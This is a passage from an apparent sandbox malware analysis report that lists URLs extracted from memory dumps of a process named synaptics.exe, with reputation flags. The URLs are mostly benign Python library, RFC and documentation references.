00000014.00000003.2710404089.000000000198D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2711655946.000000000196D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2711655946.000000000198D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2744411023.000000000190E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://tools.ietf.org/html/rfc6125#section-6.4.3synaptics.exe, 00000014.00000003.2675863176.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2678476168.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2712854335.00000000016C0000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2676220591.000000000192C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2684561105.0000000000B7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://github.coNsynaptics.exe, 00000014.00000003.2690368319.0000000001907000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2699376646.00000000018F7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2699907714.0000000001907000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://tools.ietf.org/html/rfc3986#section-3.3synaptics.exe, 00000014.00000003.2522185220.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2521705693.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2523194707.0000000000AF1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2522322435.0000000000ADD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://tools.ietf.org/html/rfc7230#section-3.2)synaptics.exe, 00000014.00000003.2522185220.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2521705693.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2523194707.0000000000AF1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2522322435.0000000000ADD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://google.com/mailsynaptics.exe, 00000014.00000003.2691596913.0000000003939000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2719616397.000000000385B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2684125738.0000000001BB1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2734524871.000000000385B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2702315091.0000000000B7A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2684280852.00000000016CE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2691397567.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2684561105.0000000000B7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://packaging.python.org/specifications/entry-points/synaptics.exe, 00000014.00000003.2665807066.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2656379556.0000000001B4F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2635460512.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2672069361.0000000001535000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.python.org/psf/license/)synaptics.exe, 00000014.00000003.2495528030.0000000000AF1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://www.phys.uu.nl/~vgent/calendar/isocalendar.htmsynaptics.exe, 00000014.00000003.2539955000.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2541956815.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2541826132.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2538852735.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2539569161.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2541660625.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://github.com/urllib3/urllib3/pull/3024synaptics.exe, 00000014.00000003.2606267033.0000000000C24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://foss.heptapod.net/pypy/pypy/-/issues/3539synaptics.exe, 00000014.00000003.2604902881.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2613750411.00000000037EE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2606267033.0000000000C24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.synaptics.exe, 00000014.00000003.2652617065.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2635897530.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2625802641.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2626064254.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2635768503.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2659715215.0000000000B56000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2627821618.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2629601575.00000000018E7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2742061088.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2646681174.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2681756928.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2672930458.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2626188130.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2631317671.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2668430759.0000000000B56000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://github.com/urllib3/urllib3/issues/2791synaptics.exe, 00000014.00000003.2616802597.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2621521060.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://google.com/synaptics.exe, 00000014.00000003.2617576664.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2619061825.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2619913019.0000000000B51000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2621884568.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2622302076.0000000001552000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2621884568.00000000016BD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2616802597.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2621521060.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://mahler:8092/site-updates.pysynaptics.exe, 00000014.00000003.2516955463.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2522185220.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2564567996.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2601360761.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2541956815.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2521322653.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2518928174.0000000000BF7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2521200941.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2569213339.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2519552085.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2516039697.0000000000C1F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2533673642.0000000000AD2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2529041976.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2607817795.0000000000ADC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2594774367.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2531202744.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2548822658.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2545729196.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2543956442.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2524312967.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2518549794.0000000000B09000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://code.activestate.com/recipes/259174/synaptics.exe, 00000014.00000003.2512844280.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2514719540.0000000000C03000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://github.com/psf/requests/issues/1846synaptics.exe, 00000014.00000003.2740898219.0000000001A63000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2737936143.0000000001535000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://.../back.jpegsynaptics.exe, 00000014.00000003.2743673267.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2740898219.0000000001A63000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2742396700.00000000019A1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2737936143.0000000001535000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://www.python.org/download/releases/2.3/mro/.synaptics.exe, 00000014.00000003.2512307678.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2507985486.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2511960109.0000000000BF7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2507752180.0000000000BF7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2509836397.0000000000AEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://httpbin.org/postsynaptics.exe, 00000014.00000003.2702048947.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2617576664.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2610844185.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2635460512.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2710705728.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2621704012.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2726427570.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2594774367.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2646261005.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2743673267.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2652173634.00000000016CE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2731721891.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2627657717.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2596221179.000000000190F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2595014388.000000000190C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2663076152.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2738332591.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2675364813.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2631052256.00000000016CE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2749443041.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2690894995.00000000016D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://erickt.github.io/blog/2014/11/19/adventures-in-debugging-a-potential-osx-kernel-bug/synaptics.exe, 00000014.00000003.2616802597.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2621521060.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://github.com/Ousret/charset_normalizersynaptics.exe, 00000014.00000003.2690368319.0000000001907000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2699376646.00000000018F7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2730254084.000000000190E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2718070490.0000000001907000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2725817031.000000000190D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2699907714.0000000001907000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2744411023.000000000190E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://github.com/urllib3/urllib3/issues/651synaptics.exe, 00000014.00000003.2616802597.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2621521060.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://urllib3.readthedocs.io/en/latest/advanced-usage.htmlsynaptics.exe, 00000014.00000003.2652360470.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2635460512.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2673059885.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2616802597.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2658121816.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2646261005.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2631052256.00000000016CE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2667401944.00000000016BC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2621521060.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://tools.ietf.org/html/rfc7231#section-6.4.4synaptics.exe, 00000014.00000003.2749100998.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://github.com/urllib3/urllib3/issues/2920synaptics.exe, 00000014.00000003.2684280852.00000000016CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://bugs.python.org/issue16298)synaptics.exe, 00000014.00000003.2625802641.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2627821618.00000000016CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      http://hg.python.org/cpython/file/7aaba721ebc0/Lib/socket.py#l252synaptics.exe, 00000014.00000003.2616802597.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2621521060.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://yahoo.com/synaptics.exe, 00000014.00000003.2691596913.0000000003939000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2719616397.000000000385B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2684125738.0000000001BB1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2734524871.000000000385B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2702315091.0000000000B7A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2684280852.00000000016CE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2691397567.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2684561105.0000000000B7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://foss.heptapod.net/pypy/pypy/-/issues/3129synaptics.exe, 00000014.00000003.2606267033.0000000000C24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6synaptics.exe, 00000014.00000003.2553352596.0000000001529000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2702048947.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2559046187.00000000016E3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2617576664.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2557067983.00000000016E3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2610844185.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2590473767.00000000016E3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2593269429.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2591275434.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2635460512.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2710705728.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2621704012.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2726427570.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2565092593.00000000016E6000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2565759692.00000000016E3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2554619703.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2553972759.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2646261005.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2743673267.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2554417159.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2652173634.00000000016CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://www.ietf.org/rfc/rfc4627.txtsynaptics.exe, 00000014.00000003.2740898219.0000000001A63000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2737936143.0000000001535000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://www.rfc-editor.org/rfc/rfc8259#section-8.1synaptics.exe, 00000014.00000003.2631606979.0000000001934000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2625802641.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2647268662.000000000192C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2627821618.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2627071554.0000000001934000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2629601575.00000000018E7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2666415324.000000000192C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2723906148.0000000001936000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2663690600.000000000190F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2676220591.000000000192C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2658366203.000000000190F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2652761780.000000000192C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2634063079.0000000001931000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2639516326.000000000190F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2687512306.000000000192F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://www.pkware.com/documents/casestudies/APPNOTE.TXTsynaptics.exe, 00000014.00000003.2666415324.0000000001948000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2652761780.0000000001948000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              http://www.iana.org/time-zones/repository/tz-link.htmlsynaptics.exe, 00000014.00000003.2539955000.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2541956815.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2541826132.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2548822658.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2545729196.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2546707152.0000000000AD2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2542238507.000000000154E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2543875670.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2539569161.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2550724245.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2541660625.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2547393423.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2549137681.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2551073215.0000000000B33000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2543768048.0000000000AF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://requests.readthedocs.iosynaptics.exe, 00000014.00000003.2702048947.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2617576664.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2610844185.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2635460512.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2710705728.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2621704012.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2726427570.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2594774367.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2646261005.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2743673267.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2652173634.00000000016CE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2731721891.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2627657717.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2596221179.000000000190F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2595014388.000000000190C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2663076152.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2738332591.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2675364813.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2631052256.00000000016CE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2749443041.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2690894995.00000000016D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://www.demo2s.com/Tutorial/Cpp/0380__set-multiset/Catalog0380__set-multiset.htmsynaptics.exe, 00000014.00000003.2512844280.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2514719540.0000000000C03000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://bugs.python.org/issue29585synaptics.exe, 00000014.00000003.2495528030.0000000000AF1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://mail.python.org/pipermail/python-bugs-list/2001-January/003752.htmlsynaptics.exe, 00000014.00000003.2530742285.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.python.orgsynaptics.exe, 00000014.00000003.2702048947.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2617576664.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2610844185.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2635460512.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2710705728.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2621704012.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2726427570.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2594774367.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2646261005.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2743673267.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2652173634.00000000016CE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2731721891.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2627657717.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2596221179.000000000190F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2595014388.000000000190C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2663076152.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000014.00000003.2738332591.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 